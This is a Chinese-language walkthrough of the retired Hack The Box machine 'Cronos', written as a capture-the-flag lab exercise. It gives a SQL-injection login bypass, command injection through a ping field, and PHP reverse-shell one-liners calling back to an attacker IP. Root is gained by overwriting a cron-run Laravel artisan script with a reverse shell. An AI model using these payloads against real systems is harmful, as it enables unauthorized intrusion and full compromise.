HTB： Cronos渗透测试 – 作者:WAFmax

基础信息

简介：Hack The Box是一个在线渗透测试平台。可以帮助你提升渗透测试技能和黑盒测试技能，平台环境都是模拟的真实环境，有助于自己更好的适应在真实环境的渗透
链接：https://www.hackthebox.eu/home/machines/profile/270
描述：注：因为是已经退役的靶机所以现在的ip地址与信息卡中的并不一致。

前言

本次演练使用kali系统按照渗透测试的过程进行操作，通过nmap进行端口扫描发现开放了dns服务，通过查看dns信息获取登录界面，反弹shell进行提权。

一、信息收集

1、靶机ip

IP地址为：10.129.30.241

2、靶机端口与服务

nmap -sV -A -O -T 4 10.129.30.241

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
53/tcp open  domain  ISC BIND 9.10.3-P4 (Ubuntu Linux)
| dns-nsid: 
|_  bind.version: 9.10.3-P4-Ubuntu
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))

发现开放了53端口与dns有关，可以进行dns解析获取相应信息，将conos.htb写入hosts文件
接下来对改地址进行解析

二、漏洞探测与利用

直接进入：admin.cronos.htb 发现这是一个登录界面
尝试进行绕过

' or 1=1 -- 

成功进入登录界面
尝试使用该语句看看是否可以运行8.8.8.8;ls
运行成功，反弹shell

php -r '$sock=fsockopen("10.10.14.82",4242);$proc=proc_open("/bin/sh -i", array(0=>$sock, 1=>$sock, 2=>$sock),$pipes);'

三、 提权

获取交互式shell

python -c 'import pty;pty.spawn("/bin/bash")'

进入home目录下查看 user.txt
使用LinEnum.sh查看是否有可利用的信息
发现存在计时任务
进入/var/www/laravel/目录查看artisan发现这是一个可执行的php脚本
我们可以写入提权语句更改artisan的内容进行提权

echo '<?php $sock = fsockopen("10.10.14.82",1234);$proc = proc_open("/bin/sh -i", array(0=>$sock, 1=>$sock, 2=>$sock), $pipes);?>' > /var/www/laravel/artisan

写入成功
使用nc监听1234端口等待片刻即可提权成功

来源：freebuf.com 2021-03-08 11:26:08 by: WAFmax